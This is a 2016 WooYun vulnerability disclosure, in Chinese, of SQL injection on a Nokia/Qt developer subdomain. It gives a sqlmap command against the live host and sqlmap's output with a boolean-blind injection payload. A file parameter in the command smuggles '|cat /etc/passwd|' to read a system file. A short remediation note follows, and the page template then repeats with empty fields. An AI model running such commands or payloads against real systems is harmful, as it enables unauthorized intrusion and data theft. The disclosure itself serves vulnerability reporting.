诺基亚某子站SQL注入（1620个表，40万数据） | wooyun-2016-0175996

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2016-0175996

漏洞标题：

诺基亚某子站SQL注入（1620个表，40万数据）

漏洞详情

披露状态：

2016-02-15：细节已通知厂商并且等待厂商处理中
2016-02-22：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

搭了个批量漏洞扫描器~~初步扫描
还真管用~
具体数据没跑，就是表名。
大战，求高分

详细说明：

注入点：

python sqlmap.py -u "http://developer.qt.nokia.com/ows-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|" --tables --thread 3

漏洞证明：

[15:08:58] [INFO] resuming back-end DBMS 'oracle'
[15:08:58] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: user_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: user_id=1) AND 7908=7908 AND (4640=4640&file=|cat /etc/passwd|
---
[15:08:59] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle

还有敏感的数据

修复方案：

预编译SQL语句，参数化SQL语句。
访问接口加个参数过滤就更好了。

版权声明：转载请注明来源 Fencing@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-02-22 09:00

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Fencing@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Fencing@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞